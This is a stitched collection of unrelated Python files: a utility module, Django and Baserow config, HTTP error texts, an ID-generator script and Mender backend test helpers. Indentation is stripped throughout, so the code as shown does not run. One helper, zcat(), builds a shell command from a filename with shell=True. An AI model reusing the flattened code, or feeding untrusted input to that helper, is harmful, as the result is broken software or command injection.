[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
>>> [list(i) for i in groupn(a, 5)]
[[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]
>>> [list(i) for i in groupn(a, 99999)]
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]]
See also chunker().'''
# FIXME: It is kind of lame that this returns lists. Any way we can return
# generators or iterables instead?
q = iter(iter_) # new iterator so we can "destructively" remove items
while True:
chunk = list(itertools.islice(q, 0, n))
if (len(chunk) == 0):
return
yield chunk
def intfloatpass(v):
'''Try to convert v to an int or float, in that order; if either succeeds,
return the result, else return v unchanged. For example:
>>> intfloatpass('1')
1
>>> intfloatpass('1.0')
1.0
>>> intfloatpass('1foo')
'1foo'
>>> intfloatpass({})
{}'''
try:
return int(v)
except ValueError:
try:
return float(v)
except ValueError:
return v
except TypeError:
return v
def lock_acquire(name):
'''Try to acquire the lock *name*. Only one process can have the lock at
once. Return immediately if the lock was acquired, otherwise raise
Lock_Error. In the latter case, there are no side effects. Locks must be
explicitly released with lock_release().'''
# FIXME: Better to do this with fcntl.lockf() or some third party library?
try:
os.mkdir(name + '.lock')
except OSError:
raise Lock_Error("can't acquire lock '%s'" % (name))
def lock_release(name):
'''Release the lock *name*. If the lock was not previously acquired, raise
an exception. (FIXME: You can currently release locks acquired by other
processes and delete unrelated directories.) See also lock_acquire().'''
os.rmdir(name + '.lock')
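# Typical usage of the directory-based lock above (a sketch; the lock name is
# arbitrary and the critical section is whatever the caller needs to protect):
#
#   try:
#      lock_acquire('/tmp/myjob')
#   except Lock_Error:
#      abort('another instance appears to be running')
#   try:
#      pass  # ... critical section ...
#   finally:
#      lock_release('/tmp/myjob')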
def logging_init(tag, file_=None, stderr_force=False, level=None,
verbose_=False, truncate=False):
'''Set up logging and return the logger object. The basic setup is that we
log to one of two different files and/or stderr:
1. If file_ is given, log there. Otherwise, log to the file in config
variable path.log. If both are given, abort with an error; if
neither, don't log to a file.
2. If sys.stderr is a TTY or stderr_force is True, then log to standard
error regardless of file logging. Otherwise, log to standard error if
there is no file log.
3. The default log level is INFO. If level is given, use that level
regardless of the following. If global variable verbose is set
(either because parse_args() did it in response to --verbose or the
verbose_ argument to this function is True), then use DEBUG.
4. If truncate is given, then truncate the log file before using it.
(Note this is only allowed for log_file_base.)
This function can be called more than once. Last call wins. Note that
truncations happens on each call!'''
if (verbose_):
global verbose
verbose = verbose_
if (level is None):
level = logging.DEBUG if verbose else logging.INFO
# Use "FATAL" instead of "CRITICAL" in logs
logging.addLevelName(50, 'FATAL')
global l
l = logging.getLogger('my_logger')
l.setLevel(level)
l.handlers = [] # delete existing handlers, to allow re-init.
# add tag string to permit logcheck filtering, which applies the same
# regexes to all files it's watching.
hostname = platform.node().split('.')[0]
pid = os.getpid()
fmt = '%s %%(levelname)-8s %%(message)s' % tag
if (log_timestamps):
fmt = '%%(asctime)s %s[%d] %s' % (hostname, pid, fmt)
form = logging.Formatter(fmt, '%Y-%m-%d_%H:%M:%S')
# file logger
try:
# FIXME: this is a sloppy test for whether a config file was read and
# path.log is available. We used to test whether c was None, but then
# importers can't say "c = u.c".
if (c.get('path', 'log') == ''):
file_ = None
else:
file_c = path_configured(c.getpath('path', 'log'))
assert (file_ is None)
assert (not truncate)
file_ = file_c
except (No_Configuration_Read, configparser.NoSectionError):
# path.log not configured, but that's OK
pass
if (file_ is not None):
if (truncate):
open(file_, 'w').close()
flog = logging.FileHandler(file_)
flog.setLevel(level)
flog.setFormatter(form)
l.addHandler(flog)
# console logger
#
# FIXME: We test that sys.stderr has isatty() because under Disco,
# sys.stderr is a MessageWriter object which does not have the method. Bug
# reported: https://github.com/discoproject/disco/issues/351
if (stderr_force
or (hasattr(sys.stderr, 'isatty') and sys.stderr.isatty())
or file_ is None):
clog = logging.StreamHandler(sys.stderr)
clog.setLevel(level)
clog.setFormatter(form)
l.addHandler(clog)
return l
def memoize(f):
'''Decorator that memoizes a function; i.e., if the function is called
again with the same arguments, the cached value is returned and the
function is not really called. Resettable. Fails with TypeError if you
pass an unhashable argument. Can't wrap functions that take keyword
arguments. For example:
>>> import random
>>> r = random.Random(1)
>>> @memoize
... def f(x):
... return (x * r.randint(0, 10**9))
>>> f(1)
144272509
>>> f(1)
144272509
>>> f.reset()
>>> f(1)
611178002
(Note that the above should work for plain functions too, but it's a
class method because doctest is getting confused.)'''
# Adapted <http://wiki.python.org/moin/PythonDecoratorLibrary#Memoize>.
# This uses some weird voodoo I don't quite understand.
f.cache = dict()
def reset():
# for some reason f.cache = dict() doesn't stick
f.cache.clear()
f.reset = reset
@functools.wraps(f)
def wrapper(*args):
if (args not in f.cache):
f.cache[args] = f(*args)
return f.cache[args]
return wrapper
def memory_use():
'''Return the amount of memory currently allocated to this process, in bytes,
as a tuple of virtual memory (VMS), real memory (RSS). For example (note
flexibility in results to accommodate different operating systems):
>>> a = 'a' * int(2e9) # string 2 billion chars long
>>> 2e9 < memory_use()[0] < 5e9
True
>>> 2e9 < memory_use()[1] < 3e9
True
>>> del a
Note: This used to have an option to get peak usage, in addition to
current usage. However, Macs seem not to be able to do this, and since
it's not critical information for our uses, that feature was removed.'''
info = psutil.Process(os.getpid()).memory_info()
return (info.vms, info.rss)
def memory_use_log(detail='', level=None):
if (detail):
detail = ' %s: ' % (detail)
if (level is None):
# l.debug is not defined at def time
level = l.debug
(vms, rss) = memory_use()
level('memory:%s vms=%s rss=%s' % (detail, fmt_bytes(vms), fmt_bytes(rss)))
def mkdir_f(path):
'''Ensure that directory path exists. That is, if path already exists and
is a directory, do nothing; otherwise, try to create directory path (and
raise appropriate OSError if that doesn't work.)'''
if (not os.path.isdir(path)):
os.mkdir(path)
def module_dir(m=None):
"""Return the directory containing the file defining module m. If m is None
(the default), return the directory containing the calling module. For
example:
>>> u_module = calling_module(0)
>>> module_dir(u_module)
'.../lib'
>>> module_dir()
'.../lib'"""
if (m is None):
m = calling_module(1)
return os.path.abspath(os.path.dirname(m.__file__))
def mpi_available_p():
   '''Return True if MPI (including mpirun) is available in a SLURM allocation,
False otherwise.'''
return bool('SLURM_NODELIST' in os.environ
and distutils.spawn.find_executable('mpirun'))
def mtime(filename):
"Return the mtime of filename, or the epoch if it doesn't exist."
try:
return os.stat(filename).st_mtime
except FileNotFoundError:
return 0
def path_configured(path):
if (cpath is None):
raise No_Configuration_Read()
return abspath(path, cpath)
def partition_sentinel(iter_, sentinel):
'''Partition an iterable at the first occurrence of a sentinel; return two
lists containing each partition. The sentinel is not included in either.
For example:
>>> partition_sentinel([1,2,3,4], 2)
([1], [3, 4])
>>> partition_sentinel([1,2,3,4], 'not_in_list')
([1, 2, 3, 4], [])
>>> partition_sentinel([], 2)
([], [])
>>> partition_sentinel([1,2,3,4], 4)
([1, 2, 3], [])
>>> partition_sentinel([1,2,3,4], 1)
([], [2, 3, 4])
>>> partition_sentinel(8675309, 2)
Traceback (most recent call last):
...
TypeError: 'int' object is not iterable'''
a = list()
iter2 = iter(iter_)
for i in iter2:
if (i == sentinel):
break
a.append(i)
b = list(iter2)
return (a, b)
def parse_args(ap, args=sys.argv[1:]):
'''Parse command line arguments and set a few globals based on the result.
Note that this function must be called before logging_init().'''
try:
args = shlex.split(os.environ['QUACARGS']) + args
except KeyError:
pass
args = ap.parse_args(args)
try:
multicore.init(args.cores)
except AttributeError:
pass
try:
rand.seed(args.random_seed)
rand_np.seed(args.random_seed)
except AttributeError:
pass
try:
global verbose
verbose = args.verbose
except AttributeError:
pass
try:
global log_timestamps
log_timestamps = not args.notimes
except AttributeError:
pass
return args
def pickle_dump(file_, obj):
t = time.time()
if (isinstance(file_, str)):
filename = file_
if (not filename.endswith(PICKLE_SUFFIX)):
filename += PICKLE_SUFFIX
fp = gzip.open(filename, 'wb', compresslevel=9)
else:
filename = '???'
fp = file_
pickle.dump(obj, fp, pickle.HIGHEST_PROTOCOL)
l.debug('pickled %s in %s' % (filename, fmt_seconds(time.time() - t)))
def pickle_load(file_):
t = time.time()
if (isinstance(file_, str)):
filename = file_
if (os.path.exists(filename)):
# bare filename exists, try that
if (filename.endswith(PICKLE_SUFFIX)):
fp = gzip.open(filename)
else:
fp = io.open(filename, 'rb')
elif (os.path.exists(filename + PICKLE_SUFFIX)):
# filename plus suffix exists, try that
fp = gzip.open(filename + PICKLE_SUFFIX)
else:
# neither exists
raise IOError('neither %s nor %s exist'
% (filename, filename + PICKLE_SUFFIX))
else:
filename = '???'
fp = file_
obj = pickle.load(fp)
l.debug('unpickled %s in %s' % (filename, fmt_seconds(time.time() - t)))
return obj
def slp(text):
'''Parse a Python index or slice notation and return a slice object. A bare
index (no colons) gets you a slice returning a one-element list with
that index (or an empty list if out-of-bounds) -- this is different than
calling slice() with that argument. An empty string gets you an empty
list. For example:
>>> a = [0, 1, 2, 3]
>>> a[slp('1:3')]
[1, 2]
>>> a[1:3]
[1, 2]
>>> a[slp('2')]
[2]
>>> a[slice(2)]
[0, 1]
>>> [a[2]]
[2]
>>> a[slp('')]
[]'''
# see http://stackoverflow.com/questions/680826/
args = [(int(s) if s.strip() else None) for s in text.split(':')]
if (len(args) == 1 and args[0] is None):
return slice(0)
elif (len(args) == 1 and isinstance(args[0], int)):
start = args[0]
stop = start + 1 if (start != -1) else None
return slice(start, stop)
else:
return slice(*args)
def sl_union(len_, *slices):
'''Given a sequence length and some slices, return the sequence of indexes
which form the union of the given slices. For example:
>>> sorted(sl_union(10, slp('0'), slp('2:4'), slp('-2:')))
[0, 2, 3, 8, 9]
Note that this function instantiates lists of length len_ (because
range() iterators don't support slicing).'''
indexes = set()
for sl in slices:
indexes.update(list(range(len_))[sl])
return indexes
def sl_union_fromtext(len_, slicetext):
"""e.g.:
>>> sorted(sl_union_fromtext(10, '0,2:4,-2:'))
[0, 2, 3, 8, 9]"""
return sl_union(len_, *list(map(slp, slicetext.split(','))))
def stdout_restore():
global stdout_copy_fno
os.dup2(stdout_copy_fno, 1)
# WARNING: Voodoo! This sets stdout to be line-buffered.
sys.stdout = os.fdopen(1, 'w', 1)
stdout_copy_fno = None
def stdout_silence():
'''Some libraries (we're looking at you, SpatiaLite!) print junk to stdout
when they're loaded. This function will silence that output, even if
it's coming from outside Python. Use stdout_unsilence() to put things
back to normal.'''
# http://stackoverflow.com/questions/4178614
devnull = open('/dev/null', 'w')
global stdout_copy_fno
stdout_copy_fno = os.dup(sys.stdout.fileno())
sys.stdout.flush()
os.dup2(devnull.fileno(), 1)
def str_to_dict(text):
'''Convert a whitespace- and colon- separated string to a dict, with values
as either ints, floats, or strs (whichever converts without exception
   first). For example:
>>> pprint(str_to_dict('a:b c:1 d:1.0'))
{'a': 'b', 'c': 1, 'd': 1.0}
>>> pprint(str_to_dict('a:1 a:2'))
{'a': 2}
>>> pprint(str_to_dict(''))
{}
>>> pprint(str_to_dict(' '))
{}
>>> pprint(str_to_dict(None))
{}
>>> pprint(str_to_dict('a::b:c'))
{'a': ':b:c'}
>>> pprint(str_to_dict('a:1 \vb:1'))
{'a': 1, 'b': 1}'''
if (text is None):
return dict()
d = dict()
for kv in text.split():
(k, _, v) = kv.partition(':')
d[k] = intfloatpass(v)
return d
def StringIO():
'''Return an in-memory buffer that you can put unicode into and get encoded
bytes out of (with the buffer attribute). It's much like io.StringIO,
   except that io.StringIO doesn't let you get the encoded bytes.'''
return io.TextIOWrapper(io.BytesIO(), encoding='utf8')
def without_common_prefix(paths):
'''Return paths with common prefix removed. For example:
>>> without_common_prefix(['/a/b/c', '/a/b/doogiehauser'])
['c', 'doogiehauser']
If paths has only one element, strip all directories:
>>> without_common_prefix(['/a/b'])
['b']
If paths is empty, return the empty list:
>>> without_common_prefix([])
[]
If one or more paths are equal to the common prefix, they will become
the empty string:
>>> without_common_prefix(['/a/b', '/a/b/c'])
['', '/c']'''
if (len(paths) == 0):
return list()
elif (len(paths) == 1):
return [os.path.basename(paths[0])]
else:
strip_ct = 0
for cvec in zip(*paths):
if (len(set(cvec)) > 1):
break
strip_ct += 1
return [i[strip_ct:] for i in paths]
def url_decode(url):
"""Given a URL fragment which may or may not be percent-encoded, return the
decoded version with appropriate non-ASCII Unicode characters, with
underscores replaced with spaces.
>>> url_decode('Sandy_Koufax')
'Sandy Koufax'
>>> url_decode('Sandy Koufax')
'Sandy Koufax'
>>> url_decode('Sandy%20Koufax')
'Sandy Koufax'
>>> url_decode('Doen%C3%A7a_cong%C3%AAnita')
'Doença congênita'
>>> url_decode('Doença%20cong%C3%AAnita')
'Doença congênita'
>>> url_decode('Doença congênita')
'Doença congênita'"""
url = urllib.parse.unquote(url)
url = url.replace('_', ' ')
return url
def url_encoded(url):
"""Given a URL fragment string which may already be percent-encoded, and
which may contain non-ASCII characters, return it as a percent-encoded
ASCII string with underscores instead of spaces.
>>> url_encoded('Sandy_Koufax')
'Sandy_Koufax'
>>> url_encoded('Sandy Koufax')
'Sandy_Koufax'
>>> url_encoded('Sandy%20Koufax')
'Sandy_Koufax'
>>> url_encoded('Doen%C3%A7a_cong%C3%AAnita')
'Doen%C3%A7a_cong%C3%AAnita'
>>> url_encoded('Doença%20cong%C3%AAnita')
'Doen%C3%A7a_cong%C3%AAnita'
>>> url_encoded('Doença congênita')
'Doen%C3%A7a_cong%C3%AAnita'"""
url = url_decode(url)
url = url.replace(' ', '_')
url = urllib.parse.quote(url)
return url
def without_ext(filename, ext):
"""Return filename with extension ext (which may or may not begin with a
dot, and which may contain multiple dots) stripped. Raise ValueError if
the file doesn't have that extension. For example:
>>> without_ext('foo.tar.gz', '.tar.gz')
'foo'
>>> without_ext('foo.tar.gz', 'tar.gz')
'foo'
>>> without_ext('foo.tar.bz2', 'tar.gz')
Traceback (most recent call last):
...
ValueError: foo.tar.bz2 does not have extension .tar.gz
"""
if (ext[0] != '.'):
ext = '.' + ext
fn_new = re.sub('%s$' % (ext), '', filename)
if (fn_new == filename):
raise ValueError('%s does not have extension %s' % (filename, ext))
return fn_new
def zcat(filename, pipeline="zcat '%s'"):
'''Return an open file descriptor containing the uncompressed content of the
given gzipped file. This is very roughly up to 10× faster than
gzip.open() (in one informal test) but costs an extra process that
consumes some CPU.
Warning: Because this uses shell pipelines, it should not be given
untrusted input.
Zombie processes are reaped when Popen object is garbage collected.'''
return subprocess.Popen(pipeline % filename, shell=True,
stdout=subprocess.PIPE).stdout
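# Minimal usage sketch for zcat(); the path below is hypothetical, not something
# defined in this module:
#
#   for line in zcat('/tmp/example.log.gz'):
#       handle(line)  # `handle` is a placeholder for the caller's own processing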
def zero_attrs(obj, attrs):
'''e.g.:
>>> class A(object):
... pass
>>> a = A()
>>> zero_attrs(a, ('a', 'b', 'c'))
>>> pprint(vars(a))
{'a': 0, 'b': 0, 'c': 0}'''
for attr in attrs:
setattr(obj, attr, 0)
# Functions to format numbers with K, M, etc. suffixes.
# e.g.: fmt_bytes(2048) -> '2.00KiB'
#
# Partly based on http://stackoverflow.com/questions/1094841
def fmt_seconds(num):
return str(timedelta(seconds=int(round(num))))
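# Illustration (not one of the module's registered doctests):
#   fmt_seconds(3661) -> '1:01:01'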
def fmt_si(num):
"""e.g.:
>>> fmt_si(1)
'1.00'
>>> fmt_si(10**3)
'1.00k'
>>> fmt_si(2**10)
'1.02k'"""
return fmt_real(num, 1000, ["", "k", "M", "G", "T", "P"])
def fmt_sparsearray(a):
nonsparse = ", ".join(str(i) for i in enumerate(a)
if i[1] != 0 and not np.isnan(i[1]))
return ('{%dz %dn%s%s}' % (sum(1 for i in a if i == 0),
sum(1 for i in a if np.isnan(i)),
' ' if nonsparse else '', nonsparse))
def fmt_bytes(num):
"""e.g.:
>>> fmt_bytes(1)
'1.00B'
>>> fmt_bytes(10**3)
'1000.00B'
>>> fmt_bytes(2**10)
'1.00KiB'
>>> fmt_bytes(10**6)
'976.56KiB'
>>> fmt_bytes(2**20)
'1.00MiB'
>>> fmt_bytes(2**30)
'1.00GiB'
>>> fmt_bytes(2**31)
'2.00GiB'
>>> fmt_bytes(2**32+1)
'4.00GiB'"""
return fmt_real(num, 1024, ["B", "KiB", "MiB", "GiB", "TiB", "PiB"])
def fmt_real(num, factor, units):
'''e.g.:
>>> fmt_real(1.23456, 10, ('a', 'b'))
'1.23a'
>>> fmt_real(12.3456, 10, ('a', 'b'))
'1.23b'
>>> fmt_real(-1.23456, 10, ('a', 'b'))
'-1.23a'
>>> fmt_real(-12.3456, 10, ('a', 'b'))
'-1.23b'
>>> fmt_real(123.456, 10, ('a', 'b'))
Traceback (most recent call last):
...
ValueError: number too large'''
if (num >= 0):
sign = ''
else:
sign = '-'
num *= -1
factor = float(factor)
for unit in units:
if (num < factor):
return ("%s%.2f%s" % (sign, num, unit))
num /= factor
raise ValueError('number too large')
# Default logger to allow testing. You should never actually see output from
# this unless tests fail.
logging_init('tstng', level=logging.WARNING)
quacbase = os.path.abspath(module_dir() + '/..')
testable.register('''
# Make sure random seed is set to a known value
>>> rand.random()
0.40224696110279223
# Memoized function fails with TypeError if passed an unhashable argument.
>>> @memoize
... def f(x):
... return x*2
>>> f(dict())
Traceback (most recent call last):
...
TypeError: unhashable type: 'dict'
# Check that memoized reset() works by looking at exposed cache.
>>> f(1)
2
>>> f.cache
{(1,): 2}
>>> f.reset()
>>> f.cache
{}
# More slices. Basically, we want (almost) the same behavior as if we had
# typed the slice into the Python interpreter. The "and None" trick is simply
# to suppress output if the expression is true, so we don't have to keep
# typing "True".
>>> a = [0, 1, 2, 3, 4]
>>> (a[slp(':')] == a) and None
>>> (a[slp('0')] == [a[0]]) and None
>>> (a[slp('4')] == [a[4]]) and None
>>> a[slp('5')]
[]
>>> (a[slp('-1')] == [a[-1]]) and None
>>> (a[slp('-2')] == [a[-2]]) and None
>>> (a[slp('-5')] == [a[-5]]) and None
>>> a[slp('-6')]
[]
>>> (a[slp('1:')] == a[1:]) and None
>>> (a[slp(':1')] == a[:1]) and None
>>> (a[slp('-2:')] == a[-2:]) and None
>>> (a[slp(':-2')] == a[:-2]) and None
>>> (a[slp('1::')] == a[1::]) and None
>>> (a[slp('::1')] == a[::1]) and None
>>> (a[slp('2::')] == a[2::]) and None
>>> (a[slp('::2')] == a[::2]) and None
>>> (a[slp('-1::')] == a[-1::]) and None
>>> (a[slp('::-1')] == a[::-1]) and None
# More unioned slices
>>> sl_union(10) # no slices
set()
>>> sl_union(0, slp('1')) # empty list
set()
>>> sorted(sl_union(10, slp('1:4'))) # one slice
[1, 2, 3]
>>> sorted(sl_union(10, slp('1:4'), slp('3'))) # overlapping slices
[1, 2, 3]
>>> sl_union(10, slp('10')) # fully out of bounds
set()
>>> sl_union(10, slp('9:11')) # partly out of bounds
{9}
>>> sl_union(10, slp('9'), slp('10')) # one in, one out
{9}
''')
# LocalWords: pformat pprint
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(
regex=r'^$',
view=views.TypeListView.as_view(),
name='type-list'
),
url(r'^delivery/$', view=views.LetterFormView.as_view(), name='delivery'),
]
|
default_app_config = 'baserow.contrib.database.config.DatabaseConfig'
|
DESCRIPTIONS = {
400: {
"title": "400 Bad Request",
"description": "The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing).",
"fix": "Please your request's syntax, framing, and routing.",
},
404: {
"title": "404 Not Found",
"description": "The server can't find the requested resource.",
"fix": "Please check your request's URL.",
},
500: {
"title": "500 Internal Server Error",
"description": "The server encountered an unexpected condition, and prevented it from fulfilling the request...",
"fix": "This is my fault.",
},
}
|
#!/usr/bin/python3
import aiohttp
import asyncio
import threading
import time
import os
import sys
import random
import binascii
import csv
import requests
# import dotenv
# from dotenv import load_dotenv
# load_dotenv()
# MY_ENV_VAR = os.getenv('NODES')
nodes = int(sys.argv[1])
count = int(sys.argv[2])
with open('./IDs.csv', mode='w') as csv_file:
writer = csv.writer(csv_file)
for i in range(count):
for j in range(nodes):
id = str(binascii.b2a_hex(os.urandom(3)))[2:-1]
writer.writerow([j + 1, id])
|
# Copyright 2021 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import pytest
import random
import time
import string
import tempfile
import os
import subprocess
from contextlib import contextmanager
import docker
import redo
import requests
import testutils.api.deviceauth as deviceauth
import testutils.api.tenantadm as tenantadm
import testutils.api.useradm as useradm
import testutils.util.crypto
from testutils.api.client import ApiClient, GATEWAY_HOSTNAME
from testutils.infra.container_manager.kubernetes_manager import isK8S
from testutils.infra.mongo import MongoClient
from testutils.infra.cli import CliUseradm, CliTenantadm
@pytest.fixture(scope="session")
def mongo():
return MongoClient("mender-mongo:27017")
@pytest.fixture(scope="function")
def clean_mongo(mongo):
"""Fixture setting up a clean (i.e. empty database). Yields
pymongo.MongoClient connected to the DB."""
mongo_cleanup(mongo)
yield mongo.client
def mongo_cleanup(mongo):
mongo.cleanup()
class User:
def __init__(self, id, name, pwd):
self.name = name
self.pwd = pwd
self.id = id
class Authset:
def __init__(self, id, did, id_data, pubkey, privkey, status):
self.id = id
self.did = did
self.id_data = id_data
self.pubkey = pubkey
self.privkey = privkey
self.status = status
class Device:
def __init__(self, id, id_data, pubkey, tenant_token=""):
self.id = id
self.id_data = id_data
self.pubkey = pubkey
self.tenant_token = tenant_token
self.authsets = []
self.token = None
class Tenant:
def __init__(self, name, id, token):
self.name = name
self.users = []
self.devices = []
self.id = id
self.tenant_token = token
def create_random_authset(dauthd1, dauthm, utoken, tenant_token=""):
"""create_device with random id data and keypair"""
priv, pub = testutils.util.crypto.get_keypair_rsa()
mac = ":".join(["{:02x}".format(random.randint(0x00, 0xFF), "x") for i in range(6)])
id_data = {"mac": mac}
return create_authset(dauthd1, dauthm, id_data, pub, priv, utoken, tenant_token)
def create_authset(dauthd1, dauthm, id_data, pubkey, privkey, utoken, tenant_token=""):
body, sighdr = deviceauth.auth_req(id_data, pubkey, privkey, tenant_token)
# submit auth req
r = dauthd1.call("POST", deviceauth.URL_AUTH_REQS, body, headers=sighdr)
assert r.status_code == 401, r.text
# dev must exist and have *this* aset
api_dev = get_device_by_id_data(dauthm, id_data, utoken)
assert api_dev is not None
aset = [
a
for a in api_dev["auth_sets"]
if testutils.util.crypto.compare_keys(a["pubkey"], pubkey)
]
assert len(aset) == 1, str(aset)
aset = aset[0]
assert aset["identity_data"] == id_data
assert aset["status"] == "pending"
return Authset(aset["id"], api_dev["id"], id_data, pubkey, privkey, "pending")
def create_user(name, pwd, tid="", containers_namespace="backend-tests"):
cli = CliUseradm(containers_namespace)
uid = cli.create_user(name, pwd, tid)
return User(uid, name, pwd)
def create_org(
name,
username,
password,
plan="os",
containers_namespace="backend-tests",
container_manager=None,
):
cli = CliTenantadm(
containers_namespace=containers_namespace, container_manager=container_manager
)
user_id = None
tenant_id = cli.create_org(name, username, password, plan=plan)
tenant_token = json.loads(cli.get_tenant(tenant_id))["tenant_token"]
host = GATEWAY_HOSTNAME
if container_manager is not None:
host = container_manager.get_mender_gateway()
api = ApiClient(useradm.URL_MGMT, host=host)
# Try log in every second for 3 minutes.
    # - There usually is a slight delay (on the order of ms) for propagating
# the created user to the db.
for i in range(3 * 60):
rsp = api.call("POST", useradm.URL_LOGIN, auth=(username, password))
if rsp.status_code == 200:
break
time.sleep(1)
assert (
rsp.status_code == 200
), "User could not log in within three minutes after organization has been created."
user_token = rsp.text
rsp = api.with_auth(user_token).call("GET", useradm.URL_USERS)
users = json.loads(rsp.text)
for user in users:
if user["email"] == username:
user_id = user["id"]
break
if user_id is None:
raise ValueError("Error retrieving user id.")
tenant = Tenant(name, tenant_id, tenant_token)
user = User(user_id, username, password)
tenant.users.append(user)
return tenant
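# Usage sketch for create_org(); the organization name and credentials below are
# made-up placeholders, not values used elsewhere in these tests:
#   tenant = create_org("acme", "admin@acme.example", "correct-horse-battery", plan="os")
#   # log in as tenant.users[0] afterwards to obtain a management token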
def get_device_by_id_data(dauthm, id_data, utoken):
page = 0
per_page = 20
qs_params = {}
found = None
while True:
page = page + 1
qs_params["page"] = page
qs_params["per_page"] = per_page
r = dauthm.with_auth(utoken).call(
"GET", deviceauth.URL_MGMT_DEVICES, qs_params=qs_params
)
assert r.status_code == 200
api_devs = r.json()
found = [d for d in api_devs if d["identity_data"] == id_data]
if len(found) > 0:
break
if len(api_devs) == 0:
break
assert len(found) == 1, "device not found by id data"
return found[0]
def change_authset_status(dauthm, did, aid, status, utoken):
r = dauthm.with_auth(utoken).call(
"PUT",
deviceauth.URL_AUTHSET_STATUS,
deviceauth.req_status(status),
path_params={"did": did, "aid": aid},
)
assert r.status_code == 204
def rand_id_data():
mac = ":".join(["{:02x}".format(random.randint(0x00, 0xFF), "x") for i in range(6)])
sn = "".join(["{}".format(random.randint(0x00, 0xFF)) for i in range(6)])
return {"mac": mac, "sn": sn}
def make_pending_device(dauthd1, dauthm, utoken, tenant_token=""):
id_data = rand_id_data()
priv, pub = testutils.util.crypto.get_keypair_rsa()
new_set = create_authset(
dauthd1, dauthm, id_data, pub, priv, utoken, tenant_token=tenant_token
)
dev = Device(new_set.did, new_set.id_data, pub, tenant_token)
dev.authsets.append(new_set)
dev.status = "pending"
return dev
def make_accepted_device(dauthd1, dauthm, utoken, tenant_token=""):
dev = make_pending_device(dauthd1, dauthm, utoken, tenant_token=tenant_token)
aset_id = dev.authsets[0].id
change_authset_status(dauthm, dev.id, aset_id, "accepted", utoken)
aset = dev.authsets[0]
aset.status = "accepted"
# obtain auth token
body, sighdr = deviceauth.auth_req(
aset.id_data, aset.pubkey, aset.privkey, tenant_token
)
r = dauthd1.call("POST", deviceauth.URL_AUTH_REQS, body, headers=sighdr)
assert r.status_code == 200
dev.token = r.text
dev.status = "accepted"
return dev
def make_accepted_devices(devauthd, devauthm, utoken, tenant_token="", num_devices=1):
"""Create accepted devices.
returns list of Device objects."""
devices = []
# some 'accepted' devices, single authset
for _ in range(num_devices):
dev = make_accepted_device(devauthd, devauthm, utoken, tenant_token)
devices.append(dev)
return devices
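# Usage sketch (assumes `devauthd` and `devauthm` ApiClients and a user token
# `utoken` already exist, as in the tests that import this module):
#   devs = make_accepted_devices(devauthd, devauthm, utoken, num_devices=3)
#   assert all(d.status == "accepted" for d in devs)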
@contextmanager
def get_mender_artifact(
artifact_name="test",
update_module="dummy",
device_types=("arm1",),
size=256,
depends=(),
provides=(),
):
data = "".join(random.choices(string.ascii_uppercase + string.digits, k=size))
f = tempfile.NamedTemporaryFile(delete=False)
f.write(data.encode("utf-8"))
f.close()
#
filename = f.name
artifact = "%s.mender" % filename
args = [
"mender-artifact",
"write",
"module-image",
"-o",
artifact,
"--artifact-name",
artifact_name,
"-T",
update_module,
"-f",
filename,
]
for device_type in device_types:
args.extend(["-t", device_type])
for depend in depends:
args.extend(["--depends", depend])
for provide in provides:
args.extend(["--provides", provide])
try:
subprocess.call(args)
yield artifact
finally:
os.unlink(filename)
os.path.exists(artifact) and os.unlink(artifact)
def wait_until_healthy(compose_project: str = "", timeout: int = 60):
"""
    wait_until_healthy polls all running containers' health check
endpoints until they return a non-error status code.
:param compose_project: the docker-compose project ID, if empty it
checks all running containers.
:param timeout: timeout in seconds.
"""
client = docker.from_env()
kwargs = {}
if compose_project != "":
kwargs["filters"] = {"label": f"com.docker.compose.project={compose_project}"}
path_map = {
"mender-api-gateway": "/ping",
"mender-auditlogs": "/api/internal/v1/auditlogs/health",
"mender-deviceconnect": "/api/internal/v1/deviceconnect/health",
"mender-deviceconfig": "/api/internal/v1/deviceconfig/health",
"mender-device-auth": "/api/internal/v1/devauth/health",
"mender-deployments": "/api/internal/v1/deployments/health",
"mender-inventory": "/api/internal/v1/inventory/health",
"mender-tenantadm": "/api/internal/v1/tenantadm/health",
"mender-useradm": "/api/internal/v1/useradm/health",
"mender-workflows": "/api/v1/health",
"minio": "/minio/health/live",
}
containers = client.containers.list(all=True, **kwargs)
for container in containers:
container_ip = None
for _, net in container.attrs["NetworkSettings"]["Networks"].items():
container_ip = net["IPAddress"]
break
if container_ip is None or container_ip == "":
continue
service = container.labels.get(
"com.docker.compose.service", container.name
).split("-enterprise")[0]
if service.startswith("mender-workflows-server"):
service = "mender-workflows"
path = path_map.get(service)
if path is None:
continue
port = 8080 if service != "minio" else 9000
for _ in redo.retrier(attempts=timeout, sleeptime=1):
try:
rsp = requests.request("GET", f"http://{container_ip}:{port}{path}")
except requests.exceptions.ConnectionError:
# A ConnectionError is expected if the service is not running yet
continue
if rsp.status_code < 300:
break
else:
raise TimeoutError(
f"Timed out waiting for service '{service}' to become healthy"
)
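# Usage sketch: block until every container of an assumed docker-compose project
# reports healthy before the test session starts ("backend-tests" is a placeholder
# project name, not something defined in this file):
#   wait_until_healthy("backend-tests", timeout=120)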
def update_tenant(tid, addons=None, plan=None, container_manager=None):
"""Call internal PUT tenantadm/tenants/{tid}"""
update = {}
if addons is not None:
update["addons"] = tenantadm.make_addons(addons)
if plan is not None:
update["plan"] = plan
tenantadm_host = (
tenantadm.HOST
if isK8S() or container_manager is None
else container_manager.get_ip_of_service("mender-tenantadm")[0] + ":8080"
)
tadm = ApiClient(tenantadm.URL_INTERNAL, host=tenantadm_host, schema="http://")
res = tadm.call(
"PUT", tenantadm.URL_INTERNAL_TENANT, body=update, path_params={"tid": tid},
)
assert res.status_code == 202
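# Usage sketch: switch a hypothetical tenant to the enterprise plan with the
# "troubleshoot" add-on enabled (tenant id and add-on name are illustrative only):
#   update_tenant("some-tenant-id", addons=["troubleshoot"], plan="enterprise")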
|
from .job import Job
from .manager import Manager
from .scheduler import Scheduler
